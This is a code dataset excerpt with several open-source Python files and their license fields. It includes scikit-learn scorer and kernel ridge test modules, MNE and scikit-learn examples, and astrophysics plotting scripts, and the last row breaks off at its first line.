repo_name stringlengths 6 67 | path stringlengths 5 185 | copies stringlengths 1 3 | size stringlengths 4 6 | content stringlengths 1.02k 962k | license stringclasses 15 values |
|---|---|---|---|---|---|
mogrodnik/piernik | problems/mcrtest/piernik_problem.py | 5 | 1868 | #!/usr/bin/env python
import sys
import numpy as np
import matplotlib
from yt.mods import load as yt_load
from pylab import *
matplotlib.use('cairo')
THRESHOLD = 1e-9
FIELD = "cr1"
def plot_diff(pf1, pf2, data1, data2, field):
wd = pf1.domain_width
n_d = pf1.domain_dimensions
ext = np.array([pf1.domain_left_edge[1], pf1.domain_right_edge[1],
pf1.domain_left_edge[2], pf1.domain_right_edge[2]])
ext *= pf1['pc']
img1 = data1.to_frb(wd[0], (n_d[1] * 10, n_d[0] * 10),
center=np.array([0, 0, 0]), height=wd[1])
img2 = data2.to_frb(wd[0], (n_d[1] * 10, n_d[0] * 10),
center=np.array([0, 0, 0]), height=wd[1])
diff = (img2[field] - img1[field]) / (img1[field] + THRESHOLD)
v = abs(diff).max()
F = figure(1, (8, 6))
imshow(diff, vmin=-v, vmax=v, extent=ext, cmap='RdBu')
bar = colorbar()
bar.ax.set_xlabel(r"$\frac{\rm{%s}^{\rm{new}} - \rm{%s}^{\rm{old}}}{\rm{%s}^{\rm{old}}}$"
% (field, field, field))
draw()
xlabel('x [pc]')
ylabel('y [pc]')
savefig('diff.png')
F = figure(1, (6, 6))
clf()
imshow(img2[field], extent=ext, cmap='algae')
xlabel('x [pc]')
ylabel('y [pc]')
savefig('field.png')
if len(sys.argv) != 3:
print("Wrong number of arguments!")
sys.exit(-1)
PF1 = yt_load(sys.argv[1])
PF2 = yt_load(sys.argv[2])
DATA1 = PF1.h.slice(2, 0.0, fields=[FIELD])
DATA2 = PF2.h.slice(2, 0.0, fields=[FIELD])
if not PF1.h.field_list == PF2.h.field_list:
print("Fields in files differ!")
sys.exit(-1)
for field in PF1.h.field_list:
if abs(DATA1[field] - DATA2[field]).max() >= THRESHOLD:
print("Field %s differs" % field)
plot_diff(PF1, PF2, DATA1, DATA2, field)
sys.exit(-1)
figure(1, (8, 6))
draw()
savefig('diff.png')
savefig('field.png')
| gpl-3.0 |
wavelets/scipy_2015_sklearn_tutorial | notebooks/solutions/06B_learning_curves.py | 21 | 1448 | from sklearn.metrics import explained_variance_score, mean_squared_error
from sklearn.cross_validation import train_test_split
def plot_learning_curve(model, err_func=explained_variance_score, N=300, n_runs=10, n_sizes=50, ylim=None):
sizes = np.linspace(5, N, n_sizes).astype(int)
train_err = np.zeros((n_runs, n_sizes))
validation_err = np.zeros((n_runs, n_sizes))
for i in range(n_runs):
for j, size in enumerate(sizes):
xtrain, xtest, ytrain, ytest = train_test_split(
X, y, train_size=size, random_state=i)
# Train on only the first `size` points
model.fit(xtrain, ytrain)
validation_err[i, j] = err_func(ytest, model.predict(xtest))
train_err[i, j] = err_func(ytrain, model.predict(xtrain))
plt.plot(sizes, validation_err.mean(axis=0), lw=2, label='validation')
plt.plot(sizes, train_err.mean(axis=0), lw=2, label='training')
plt.xlabel('traning set size')
plt.ylabel(err_func.__name__.replace('_', ' '))
plt.grid(True)
plt.legend(loc=0)
plt.xlim(0, N-1)
if ylim:
plt.ylim(ylim)
plt.figure(figsize=(10, 8))
for i, model in enumerate([Lasso(0.01), Ridge(0.06)]):
plt.subplot(221 + i)
plot_learning_curve(model, ylim=(0, 1))
plt.title(model.__class__.__name__)
plt.subplot(223 + i)
plot_learning_curve(model, err_func=mean_squared_error, ylim=(0, 8000))
| cc0-1.0 |
jereze/scikit-learn | sklearn/tests/test_kernel_ridge.py | 342 | 3027 | import numpy as np
import scipy.sparse as sp
from sklearn.datasets import make_regression
from sklearn.linear_model import Ridge
from sklearn.kernel_ridge import KernelRidge
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_array_almost_equal
X, y = make_regression(n_features=10)
Xcsr = sp.csr_matrix(X)
Xcsc = sp.csc_matrix(X)
Y = np.array([y, y]).T
def test_kernel_ridge():
pred = Ridge(alpha=1, fit_intercept=False).fit(X, y).predict(X)
pred2 = KernelRidge(kernel="linear", alpha=1).fit(X, y).predict(X)
assert_array_almost_equal(pred, pred2)
def test_kernel_ridge_csr():
pred = Ridge(alpha=1, fit_intercept=False,
solver="cholesky").fit(Xcsr, y).predict(Xcsr)
pred2 = KernelRidge(kernel="linear", alpha=1).fit(Xcsr, y).predict(Xcsr)
assert_array_almost_equal(pred, pred2)
def test_kernel_ridge_csc():
pred = Ridge(alpha=1, fit_intercept=False,
solver="cholesky").fit(Xcsc, y).predict(Xcsc)
pred2 = KernelRidge(kernel="linear", alpha=1).fit(Xcsc, y).predict(Xcsc)
assert_array_almost_equal(pred, pred2)
def test_kernel_ridge_singular_kernel():
# alpha=0 causes a LinAlgError in computing the dual coefficients,
# which causes a fallback to a lstsq solver. This is tested here.
pred = Ridge(alpha=0, fit_intercept=False).fit(X, y).predict(X)
kr = KernelRidge(kernel="linear", alpha=0)
ignore_warnings(kr.fit)(X, y)
pred2 = kr.predict(X)
assert_array_almost_equal(pred, pred2)
def test_kernel_ridge_precomputed():
for kernel in ["linear", "rbf", "poly", "cosine"]:
K = pairwise_kernels(X, X, metric=kernel)
pred = KernelRidge(kernel=kernel).fit(X, y).predict(X)
pred2 = KernelRidge(kernel="precomputed").fit(K, y).predict(K)
assert_array_almost_equal(pred, pred2)
def test_kernel_ridge_precomputed_kernel_unchanged():
K = np.dot(X, X.T)
K2 = K.copy()
KernelRidge(kernel="precomputed").fit(K, y)
assert_array_almost_equal(K, K2)
def test_kernel_ridge_sample_weights():
K = np.dot(X, X.T) # precomputed kernel
sw = np.random.RandomState(0).rand(X.shape[0])
pred = Ridge(alpha=1,
fit_intercept=False).fit(X, y, sample_weight=sw).predict(X)
pred2 = KernelRidge(kernel="linear",
alpha=1).fit(X, y, sample_weight=sw).predict(X)
pred3 = KernelRidge(kernel="precomputed",
alpha=1).fit(K, y, sample_weight=sw).predict(K)
assert_array_almost_equal(pred, pred2)
assert_array_almost_equal(pred, pred3)
def test_kernel_ridge_multi_output():
pred = Ridge(alpha=1, fit_intercept=False).fit(X, Y).predict(X)
pred2 = KernelRidge(kernel="linear", alpha=1).fit(X, Y).predict(X)
assert_array_almost_equal(pred, pred2)
pred3 = KernelRidge(kernel="linear", alpha=1).fit(X, y).predict(X)
pred3 = np.array([pred3, pred3]).T
assert_array_almost_equal(pred2, pred3)
| bsd-3-clause |
mne-tools/mne-tools.github.io | 0.12/_downloads/plot_spatio_temporal_cluster_stats_sensor.py | 7 | 7157 | """
.. _stats_cluster_sensors_2samp_spatial:
=====================================================
Spatiotemporal permutation F-test on full sensor data
=====================================================
Tests for differential evoked responses in at least
one condition using a permutation clustering test.
The FieldTrip neighbor templates will be used to determine
the adjacency between sensors. This serves as a spatial prior
to the clustering. Significant spatiotemporal clusters will then
be visualized using custom matplotlib code.
"""
# Authors: Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mne.viz import plot_topomap
import mne
from mne.stats import spatio_temporal_cluster_test
from mne.datasets import sample
from mne.channels import read_ch_connectivity
print(__doc__)
###############################################################################
# Set parameters
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
event_id = {'Aud_L': 1, 'Aud_R': 2, 'Vis_L': 3, 'Vis_R': 4}
tmin = -0.2
tmax = 0.5
# Setup for reading the raw data
raw = mne.io.Raw(raw_fname, preload=True)
raw.filter(1, 30)
events = mne.read_events(event_fname)
###############################################################################
# Read epochs for the channel of interest
picks = mne.pick_types(raw.info, meg='mag', eog=True)
reject = dict(mag=4e-12, eog=150e-6)
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=None, reject=reject, preload=True)
epochs.drop_channels(['EOG 061'])
epochs.equalize_event_counts(event_id, copy=False)
condition_names = 'Aud_L', 'Aud_R', 'Vis_L', 'Vis_R'
X = [epochs[k].get_data() for k in condition_names] # as 3D matrix
X = [np.transpose(x, (0, 2, 1)) for x in X] # transpose for clustering
###############################################################################
# load FieldTrip neighbor definition to setup sensor connectivity
connectivity, ch_names = read_ch_connectivity('neuromag306mag')
print(type(connectivity)) # it's a sparse matrix!
plt.imshow(connectivity.toarray(), cmap='gray', origin='lower',
interpolation='nearest')
plt.xlabel('{} Magnetometers'.format(len(ch_names)))
plt.ylabel('{} Magnetometers'.format(len(ch_names)))
plt.title('Between-sensor adjacency')
###############################################################################
# Compute permutation statistic
#
# How does it work? We use clustering to `bind` together features which are
# similar. Our features are the magnetic fields measured over our sensor
# array at different times. This reduces the multiple comparison problem.
# To compute the actual test-statistic, we first sum all F-values in all
# clusters. We end up with one statistic for each cluster.
# Then we generate a distribution from the data by shuffling our conditions
# between our samples and recomputing our clusters and the test statistics.
# We test for the significance of a given cluster by computing the probability
# of observing a cluster of that size. For more background read:
# Maris/Oostenveld (2007), "Nonparametric statistical testing of EEG- and
# MEG-data" Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
# doi:10.1016/j.jneumeth.2007.03.024
# set cluster threshold
threshold = 50.0 # very high, but the test is quite sensitive on this data
# set family-wise p-value
p_accept = 0.001
cluster_stats = spatio_temporal_cluster_test(X, n_permutations=1000,
threshold=threshold, tail=1,
n_jobs=2,
connectivity=connectivity)
T_obs, clusters, p_values, _ = cluster_stats
good_cluster_inds = np.where(p_values < p_accept)[0]
# Note. The same functions works with source estimate. The only differences
# are the origin of the data, the size, and the connectivity definition.
# It can be used for single trials or for groups of subjects.
###############################################################################
# Visualize clusters
# configure variables for visualization
times = epochs.times * 1e3
colors = 'r', 'r', 'steelblue', 'steelblue'
linestyles = '-', '--', '-', '--'
# grand average as numpy arrray
grand_ave = np.array(X).mean(axis=1)
# get sensor positions via layout
pos = mne.find_layout(epochs.info).pos
# loop over significant clusters
for i_clu, clu_idx in enumerate(good_cluster_inds):
# unpack cluster infomation, get unique indices
time_inds, space_inds = np.squeeze(clusters[clu_idx])
ch_inds = np.unique(space_inds)
time_inds = np.unique(time_inds)
# get topography for F stat
f_map = T_obs[time_inds, ...].mean(axis=0)
# get signals at significant sensors
signals = grand_ave[..., ch_inds].mean(axis=-1)
sig_times = times[time_inds]
# create spatial mask
mask = np.zeros((f_map.shape[0], 1), dtype=bool)
mask[ch_inds, :] = True
# initialize figure
fig, ax_topo = plt.subplots(1, 1, figsize=(10, 3))
title = 'Cluster #{0}'.format(i_clu + 1)
fig.suptitle(title, fontsize=14)
# plot average test statistic and mark significant sensors
image, _ = plot_topomap(f_map, pos, mask=mask, axis=ax_topo,
cmap='Reds', vmin=np.min, vmax=np.max)
# advanced matplotlib for showing image with figure and colorbar
# in one plot
divider = make_axes_locatable(ax_topo)
# add axes for colorbar
ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)
plt.colorbar(image, cax=ax_colorbar)
ax_topo.set_xlabel('Averaged F-map ({:0.1f} - {:0.1f} ms)'.format(
*sig_times[[0, -1]]
))
# add new axis for time courses and plot time courses
ax_signals = divider.append_axes('right', size='300%', pad=1.2)
for signal, name, col, ls in zip(signals, condition_names, colors,
linestyles):
ax_signals.plot(times, signal, color=col, linestyle=ls, label=name)
# add information
ax_signals.axvline(0, color='k', linestyle=':', label='stimulus onset')
ax_signals.set_xlim([times[0], times[-1]])
ax_signals.set_xlabel('time [ms]')
ax_signals.set_ylabel('evoked magnetic fields [fT]')
# plot significant time range
ymin, ymax = ax_signals.get_ylim()
ax_signals.fill_betweenx((ymin, ymax), sig_times[0], sig_times[-1],
color='orange', alpha=0.3)
ax_signals.legend(loc='lower right')
ax_signals.set_ylim(ymin, ymax)
# clean up viz
mne.viz.tight_layout(fig=fig)
fig.subplots_adjust(bottom=.05)
plt.show()
"""
Exercises
----------
- What is the smallest p-value you can obtain, given the finite number of
permutations?
- use an F distribution to compute the threshold by traditional significance
levels. Hint: take a look at ```scipy.stats.distributions.f```
"""
| bsd-3-clause |
guangtunbenzhu/BGT-Cosmology | Spectroscopy/emissioninfill_movie.py | 1 | 1832 | import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import speclines
import ebossspec, ebossanalysis
data = ebossanalysis.unify_emissionline_profile_readin()
absorption = ebossanalysis.unify_absorptionline_profile_readin()
vel = data['VEL']
yabs = 1.-(1.-absorption['UNIFIEDABSORPTION'])*1.25
yabs[yabs<0.] = 0.
yemi = data['UNIFIEDFLUX']-1.
CM = plt.get_cmap('jet_r')
fig, ax = plt.subplots(figsize=(11,5), ncols=1, nrows=1)
fig.subplots_adjust(hspace=0, top=0.90, bottom=0.15)
nplot = 35
demi = 0.7/nplot
xlimits = [-700, 500]
for i in np.arange(nplot)*demi:
thiscolor = CM(i/0.7+0.08/0.7)
flux = yabs+yemi*i
flux_norm = np.sum(1.-flux[100-5:100+4])
flux = 1.-(1.-flux)/flux_norm
ax.plot(vel, flux, color=thiscolor, lw=3)#, drawstyle='steps')
ax.set_xlim(-700, 500)
ax.set_ylim(0.745, 1.03)
ax.plot(xlimits, [1,1], ':', color='black', lw=2)
ax.set_xlabel(r'Velocity [km$\,$s$^{-1}$]', fontsize=24)
ax.set_ylabel(r'$\left<R(\lambda)\right>$', fontsize=24)
ax.tick_params(axis='x', which='major', length=8, width=2, labelsize=22, pad=8)
ax.tick_params(axis='y', which='major', length=8, width=2, labelsize=22, pad=8)
ax.plot([0,0],[-0.01,1.05],':', color='black', lw=2)
outfile = ('Figures/Movies/Emission_Infill_Movie_{0:4.2f}.jpg').format(i)
fig.savefig(outfile)
ax.cla()
#ax.plot(xtmp, ytmp, '--', lw=6, color='green')
#ax.text(-750, 1.3, 'Unified Absorption Profile (Flipped)', color='Red', fontsize=21)
#ax.text(-750, 1.26, 'Unified Emission Profile', color='Blue', fontsize=21)
#ax.text(-750, 1.22, r'Gaussian ($\sigma=108\,$km s$^{-1}$)', color='Green', fontsize=21)
#plt.setp(ax.get_xticklabels(), visible=False)
#fig.savefig('/Users/Benjamin/Dropbox/Zhu_Projects/Fine Structure Emission/Version 1/OIII_Emission_Gaussian.eps')
| mit |
liyu1990/sklearn | examples/neural_networks/plot_rbm_logistic_classification.py | 99 | 4608 | """
==============================================================
Restricted Boltzmann Machine features for digit classification
==============================================================
For greyscale image data where pixel values can be interpreted as degrees of
blackness on a white background, like handwritten digit recognition, the
Bernoulli Restricted Boltzmann machine model (:class:`BernoulliRBM
<sklearn.neural_network.BernoulliRBM>`) can perform effective non-linear
feature extraction.
In order to learn good latent representations from a small dataset, we
artificially generate more labeled data by perturbing the training data with
linear shifts of 1 pixel in each direction.
This example shows how to build a classification pipeline with a BernoulliRBM
feature extractor and a :class:`LogisticRegression
<sklearn.linear_model.LogisticRegression>` classifier. The hyperparameters
of the entire model (learning rate, hidden layer size, regularization)
were optimized by grid search, but the search is not reproduced here because
of runtime constraints.
Logistic regression on raw pixel values is presented for comparison. The
example shows that the features extracted by the BernoulliRBM help improve the
classification accuracy.
"""
from __future__ import print_function
print(__doc__)
# Authors: Yann N. Dauphin, Vlad Niculae, Gabriel Synnaeve
# License: BSD
import numpy as np
import matplotlib.pyplot as plt
from scipy.ndimage import convolve
from sklearn import linear_model, datasets, metrics
from sklearn.model_selection import train_test_split
from sklearn.neural_network import BernoulliRBM
from sklearn.pipeline import Pipeline
###############################################################################
# Setting up
def nudge_dataset(X, Y):
"""
This produces a dataset 5 times bigger than the original one,
by moving the 8x8 images in X around by 1px to left, right, down, up
"""
direction_vectors = [
[[0, 1, 0],
[0, 0, 0],
[0, 0, 0]],
[[0, 0, 0],
[1, 0, 0],
[0, 0, 0]],
[[0, 0, 0],
[0, 0, 1],
[0, 0, 0]],
[[0, 0, 0],
[0, 0, 0],
[0, 1, 0]]]
shift = lambda x, w: convolve(x.reshape((8, 8)), mode='constant',
weights=w).ravel()
X = np.concatenate([X] +
[np.apply_along_axis(shift, 1, X, vector)
for vector in direction_vectors])
Y = np.concatenate([Y for _ in range(5)], axis=0)
return X, Y
# Load Data
digits = datasets.load_digits()
X = np.asarray(digits.data, 'float32')
X, Y = nudge_dataset(X, digits.target)
X = (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,
test_size=0.2,
random_state=0)
# Models we will use
logistic = linear_model.LogisticRegression()
rbm = BernoulliRBM(random_state=0, verbose=True)
classifier = Pipeline(steps=[('rbm', rbm), ('logistic', logistic)])
###############################################################################
# Training
# Hyper-parameters. These were set by cross-validation,
# using a GridSearchCV. Here we are not performing cross-validation to
# save time.
rbm.learning_rate = 0.06
rbm.n_iter = 20
# More components tend to give better prediction performance, but larger
# fitting time
rbm.n_components = 100
logistic.C = 6000.0
# Training RBM-Logistic Pipeline
classifier.fit(X_train, Y_train)
# Training Logistic regression
logistic_classifier = linear_model.LogisticRegression(C=100.0)
logistic_classifier.fit(X_train, Y_train)
###############################################################################
# Evaluation
print()
print("Logistic regression using RBM features:\n%s\n" % (
metrics.classification_report(
Y_test,
classifier.predict(X_test))))
print("Logistic regression using raw pixel features:\n%s\n" % (
metrics.classification_report(
Y_test,
logistic_classifier.predict(X_test))))
###############################################################################
# Plotting
plt.figure(figsize=(4.2, 4))
for i, comp in enumerate(rbm.components_):
plt.subplot(10, 10, i + 1)
plt.imshow(comp.reshape((8, 8)), cmap=plt.cm.gray_r,
interpolation='nearest')
plt.xticks(())
plt.yticks(())
plt.suptitle('100 components extracted by RBM', fontsize=16)
plt.subplots_adjust(0.08, 0.02, 0.92, 0.85, 0.08, 0.23)
plt.show()
| bsd-3-clause |
mikebenfield/scikit-learn | sklearn/metrics/scorer.py | 33 | 17925 | """
The :mod:`sklearn.metrics.scorer` submodule implements a flexible
interface for model selection and evaluation using
arbitrary score functions.
A scorer object is a callable that can be passed to
:class:`sklearn.model_selection.GridSearchCV` or
:func:`sklearn.model_selection.cross_val_score` as the ``scoring``
parameter, to specify how a model should be evaluated.
The signature of the call is ``(estimator, X, y)`` where ``estimator``
is the model to be evaluated, ``X`` is the test data and ``y`` is the
ground truth labeling (or ``None`` in the case of unsupervised models).
"""
# Authors: Andreas Mueller <amueller@ais.uni-bonn.de>
# Lars Buitinck
# Arnaud Joly <arnaud.v.joly@gmail.com>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
import warnings
import numpy as np
from . import (r2_score, median_absolute_error, mean_absolute_error,
mean_squared_error, mean_squared_log_error, accuracy_score,
f1_score, roc_auc_score, average_precision_score,
precision_score, recall_score, log_loss)
from .cluster import adjusted_rand_score
from .cluster import homogeneity_score
from .cluster import completeness_score
from .cluster import v_measure_score
from .cluster import mutual_info_score
from .cluster import adjusted_mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import fowlkes_mallows_score
from ..utils.multiclass import type_of_target
from ..externals import six
from ..base import is_regressor
class _BaseScorer(six.with_metaclass(ABCMeta, object)):
def __init__(self, score_func, sign, kwargs):
self._kwargs = kwargs
self._score_func = score_func
self._sign = sign
# XXX After removing the deprecated scorers (v0.20) remove the
# XXX deprecation_msg property again and remove __call__'s body again
self._deprecation_msg = None
@abstractmethod
def __call__(self, estimator, X, y, sample_weight=None):
if self._deprecation_msg is not None:
warnings.warn(self._deprecation_msg,
category=DeprecationWarning,
stacklevel=2)
def __repr__(self):
kwargs_string = "".join([", %s=%s" % (str(k), str(v))
for k, v in self._kwargs.items()])
return ("make_scorer(%s%s%s%s)"
% (self._score_func.__name__,
"" if self._sign > 0 else ", greater_is_better=False",
self._factory_args(), kwargs_string))
def _factory_args(self):
"""Return non-default make_scorer arguments for repr."""
return ""
class _PredictScorer(_BaseScorer):
def __call__(self, estimator, X, y_true, sample_weight=None):
"""Evaluate predicted target values for X relative to y_true.
Parameters
----------
estimator : object
Trained estimator to use for scoring. Must have a predict_proba
method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to estimator.predict.
y_true : array-like
Gold standard target values for X.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
super(_PredictScorer, self).__call__(estimator, X, y_true,
sample_weight=sample_weight)
y_pred = estimator.predict(X)
if sample_weight is not None:
return self._sign * self._score_func(y_true, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y_true, y_pred,
**self._kwargs)
class _ProbaScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate predicted probabilities for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have a predict_proba
method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not probabilities.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
super(_ProbaScorer, self).__call__(clf, X, y,
sample_weight=sample_weight)
y_pred = clf.predict_proba(X)
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_proba=True"
class _ThresholdScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate decision function output for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have either a
decision_function method or a predict_proba method; the output of
that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.decision_function or
clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not decision function values.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
super(_ThresholdScorer, self).__call__(clf, X, y,
sample_weight=sample_weight)
y_type = type_of_target(y)
if y_type not in ("binary", "multilabel-indicator"):
raise ValueError("{0} format is not supported".format(y_type))
if is_regressor(clf):
y_pred = clf.predict(X)
else:
try:
y_pred = clf.decision_function(X)
# For multi-output multi-class estimator
if isinstance(y_pred, list):
y_pred = np.vstack(p for p in y_pred).T
except (NotImplementedError, AttributeError):
y_pred = clf.predict_proba(X)
if y_type == "binary":
y_pred = y_pred[:, 1]
elif isinstance(y_pred, list):
y_pred = np.vstack([p[:, -1] for p in y_pred]).T
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_threshold=True"
def get_scorer(scoring):
if isinstance(scoring, six.string_types):
try:
scorer = SCORERS[scoring]
except KeyError:
scorers = [scorer for scorer in SCORERS
if SCORERS[scorer]._deprecation_msg is None]
raise ValueError('%r is not a valid scoring value. '
'Valid options are %s'
% (scoring, sorted(scorers)))
else:
scorer = scoring
return scorer
def _passthrough_scorer(estimator, *args, **kwargs):
"""Function that wraps estimator.score"""
return estimator.score(*args, **kwargs)
def check_scoring(estimator, scoring=None, allow_none=False):
"""Determine scorer from user options.
A TypeError will be thrown if the estimator cannot be scored.
Parameters
----------
estimator : estimator object implementing 'fit'
The object to use to fit the data.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
allow_none : boolean, optional, default: False
If no scoring is specified and the estimator has no score function, we
can either return None or raise an exception.
Returns
-------
scoring : callable
A scorer callable object / function with signature
``scorer(estimator, X, y)``.
"""
has_scoring = scoring is not None
if not hasattr(estimator, 'fit'):
raise TypeError("estimator should be an estimator implementing "
"'fit' method, %r was passed" % estimator)
if isinstance(scoring, six.string_types):
return get_scorer(scoring)
elif has_scoring:
# Heuristic to ensure user has not passed a metric
module = getattr(scoring, '__module__', None)
if hasattr(module, 'startswith') and \
module.startswith('sklearn.metrics.') and \
not module.startswith('sklearn.metrics.scorer') and \
not module.startswith('sklearn.metrics.tests.'):
raise ValueError('scoring value %r looks like it is a metric '
'function rather than a scorer. A scorer should '
'require an estimator as its first parameter. '
'Please use `make_scorer` to convert a metric '
'to a scorer.' % scoring)
return get_scorer(scoring)
elif hasattr(estimator, 'score'):
return _passthrough_scorer
elif allow_none:
return None
else:
raise TypeError(
"If no scoring is specified, the estimator passed should "
"have a 'score' method. The estimator %r does not." % estimator)
def make_scorer(score_func, greater_is_better=True, needs_proba=False,
needs_threshold=False, **kwargs):
"""Make a scorer from a performance metric or loss function.
This factory function wraps scoring functions for use in GridSearchCV
and cross_val_score. It takes a score function, such as ``accuracy_score``,
``mean_squared_error``, ``adjusted_rand_index`` or ``average_precision``
and returns a callable that scores an estimator's output.
Read more in the :ref:`User Guide <scoring>`.
Parameters
----------
score_func : callable,
Score function (or loss function) with signature
``score_func(y, y_pred, **kwargs)``.
greater_is_better : boolean, default=True
Whether score_func is a score function (default), meaning high is good,
or a loss function, meaning low is good. In the latter case, the
scorer object will sign-flip the outcome of the score_func.
needs_proba : boolean, default=False
Whether score_func requires predict_proba to get probability estimates
out of a classifier.
needs_threshold : boolean, default=False
Whether score_func takes a continuous decision certainty.
This only works for binary classification using estimators that
have either a decision_function or predict_proba method.
For example ``average_precision`` or the area under the roc curve
can not be computed using discrete predictions alone.
**kwargs : additional arguments
Additional parameters to be passed to score_func.
Returns
-------
scorer : callable
Callable object that returns a scalar score; greater is better.
Examples
--------
>>> from sklearn.metrics import fbeta_score, make_scorer
>>> ftwo_scorer = make_scorer(fbeta_score, beta=2)
>>> ftwo_scorer
make_scorer(fbeta_score, beta=2)
>>> from sklearn.model_selection import GridSearchCV
>>> from sklearn.svm import LinearSVC
>>> grid = GridSearchCV(LinearSVC(), param_grid={'C': [1, 10]},
... scoring=ftwo_scorer)
"""
sign = 1 if greater_is_better else -1
if needs_proba and needs_threshold:
raise ValueError("Set either needs_proba or needs_threshold to True,"
" but not both.")
if needs_proba:
cls = _ProbaScorer
elif needs_threshold:
cls = _ThresholdScorer
else:
cls = _PredictScorer
return cls(score_func, sign, kwargs)
# Standard regression scores
r2_scorer = make_scorer(r2_score)
neg_mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
deprecation_msg = ('Scoring method mean_squared_error was renamed to '
'neg_mean_squared_error in version 0.18 and will '
'be removed in 0.20.')
mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
mean_squared_error_scorer._deprecation_msg = deprecation_msg
neg_mean_squared_log_error_scorer = make_scorer(mean_squared_log_error,
greater_is_better=False)
neg_mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
deprecation_msg = ('Scoring method mean_absolute_error was renamed to '
'neg_mean_absolute_error in version 0.18 and will '
'be removed in 0.20.')
mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
mean_absolute_error_scorer._deprecation_msg = deprecation_msg
neg_median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
deprecation_msg = ('Scoring method median_absolute_error was renamed to '
'neg_median_absolute_error in version 0.18 and will '
'be removed in 0.20.')
median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
median_absolute_error_scorer._deprecation_msg = deprecation_msg
# Standard Classification Scores
accuracy_scorer = make_scorer(accuracy_score)
f1_scorer = make_scorer(f1_score)
# Score functions that need decision values
roc_auc_scorer = make_scorer(roc_auc_score, greater_is_better=True,
needs_threshold=True)
average_precision_scorer = make_scorer(average_precision_score,
needs_threshold=True)
precision_scorer = make_scorer(precision_score)
recall_scorer = make_scorer(recall_score)
# Score function for probabilistic classification
neg_log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
deprecation_msg = ('Scoring method log_loss was renamed to '
'neg_log_loss in version 0.18 and will be removed in 0.20.')
log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
log_loss_scorer._deprecation_msg = deprecation_msg
# Clustering scores
adjusted_rand_scorer = make_scorer(adjusted_rand_score)
homogeneity_scorer = make_scorer(homogeneity_score)
completeness_scorer = make_scorer(completeness_score)
v_measure_scorer = make_scorer(v_measure_score)
mutual_info_scorer = make_scorer(mutual_info_score)
adjusted_mutual_info_scorer = make_scorer(adjusted_mutual_info_score)
normalized_mutual_info_scorer = make_scorer(normalized_mutual_info_score)
fowlkes_mallows_scorer = make_scorer(fowlkes_mallows_score)
SCORERS = dict(r2=r2_scorer,
neg_median_absolute_error=neg_median_absolute_error_scorer,
neg_mean_absolute_error=neg_mean_absolute_error_scorer,
neg_mean_squared_error=neg_mean_squared_error_scorer,
neg_mean_squared_log_error=neg_mean_squared_log_error_scorer,
median_absolute_error=median_absolute_error_scorer,
mean_absolute_error=mean_absolute_error_scorer,
mean_squared_error=mean_squared_error_scorer,
accuracy=accuracy_scorer, roc_auc=roc_auc_scorer,
average_precision=average_precision_scorer,
log_loss=log_loss_scorer,
neg_log_loss=neg_log_loss_scorer,
# Cluster metrics that use supervised evaluation
adjusted_rand_score=adjusted_rand_scorer,
homogeneity_score=homogeneity_scorer,
completeness_score=completeness_scorer,
v_measure_score=v_measure_scorer,
mutual_info_score=mutual_info_scorer,
adjusted_mutual_info_score=adjusted_mutual_info_scorer,
normalized_mutual_info_score=normalized_mutual_info_scorer,
fowlkes_mallows_score=fowlkes_mallows_scorer)
for name, metric in [('precision', precision_score),
('recall', recall_score), ('f1', f1_score)]:
SCORERS[name] = make_scorer(metric)
for average in ['macro', 'micro', 'samples', 'weighted']:
qualified_name = '{0}_{1}'.format(name, average)
SCORERS[qualified_name] = make_scorer(metric, pos_label=None,
average=average)
| bsd-3-clause |
pyrolysis/low-order-particle | oak-diff.py | 1 | 2887 | """
